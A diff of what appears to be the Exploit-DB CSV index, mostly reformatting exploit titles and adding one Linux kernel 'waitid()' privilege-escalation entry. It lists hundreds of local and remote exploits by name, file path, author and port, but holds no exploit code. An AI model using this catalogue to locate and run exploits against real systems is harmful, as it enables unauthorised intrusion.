 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
-29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
+29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
 29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0
 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0
@ -8585,7 +8586,7 @@ id,file,description,date,author,platform,type,port
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0
-32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
+32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
@ -8785,10 +8786,10 @@ id,file,description,date,author,platform,type,port
 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0
 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0
-37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
+37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0
-37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
+37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation",2015-08-18,kpwn,osx,local,0
 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local,0
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
 37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
@ -8849,7 +8850,7 @@ id,file,description,date,author,platform,type,port
 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,linux,local,0
 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0
 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
-38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
+38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation",2015-10-01,rebel,osx,local,0
 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0
 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0
@ -8865,7 +8866,7 @@ id,file,description,date,author,platform,type,port
 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0
 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0
 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
-38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
+38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0
 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0
@ -9003,7 +9004,7 @@ id,file,description,date,author,platform,type,port
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
-40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
+40141,platforms/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Privilege Escalation",2016-07-21,akat1,bsd,local,0
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0
 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
@ -9213,9 +9214,9 @@ id,file,description,date,author,platform,type,port
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
-41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
-41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
-41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
+41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
 42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
@ -9243,9 +9244,9 @@ id,file,description,date,author,platform,type,port
 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0
 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0
 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
-42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
+42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0
@ -9304,6 +9305,7 @@ id,file,description,date,author,platform,type,port
 43006,platforms/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839
 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0
 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0
+43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9483,7 +9485,7 @@ id,file,description,date,author,platform,type,port
 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
 405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
-409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
+409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
 418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
@ -11715,7 +11717,7 @@ id,file,description,date,author,platform,type,port
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
-18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
+18181,platforms/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@ -11733,7 +11735,7 @@ id,file,description,date,author,platform,type,port
 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0
-18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
+18369,platforms/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0
@ -11834,7 +11836,7 @@ id,file,description,date,author,platform,type,port
 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0
 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0
 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
-19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
+19039,platforms/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
@ -11942,8 +11944,8 @@ id,file,description,date,author,platform,type,port
 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0
 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0
 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0
-19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0
-19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0
+19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0
+19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0
 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817
 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0
 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0
@ -11957,7 +11959,7 @@ id,file,description,date,author,platform,type,port
 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
-19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
+19520,platforms/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0
@ -12399,7 +12401,7 @@ id,file,description,date,author,platform,type,port
 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0
 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0
 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0
-20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0
+20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0
 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0
 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0
 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0
@ -12470,8 +12472,8 @@ id,file,description,date,author,platform,type,port
 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0
 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0
 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0
-20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
-20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
+20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
+20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0
 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0
@ -12571,7 +12573,7 @@ id,file,description,date,author,platform,type,port
 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0
 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0
 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0
-21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow",2001-07-18,Dvorak,unix,remote,0
+21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow",2001-07-18,Dvorak,unix,remote,0
 20966,platforms/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote,0
 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0
 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0
@ -12718,7 +12720,7 @@ id,file,description,date,author,platform,type,port
 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0
 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0
 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
-21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
+21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0
 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0
@ -15097,7 +15099,7 @@ id,file,description,date,author,platform,type,port
 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
-35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0
+35427,platforms/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit",2014-12-02,dash,bsd,remote,0
 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0
 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0
 35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655
@ -15917,6 +15919,10 @@ id,file,description,date,author,platform,type,port
 42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0
 42996,platforms/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",ios,remote,0
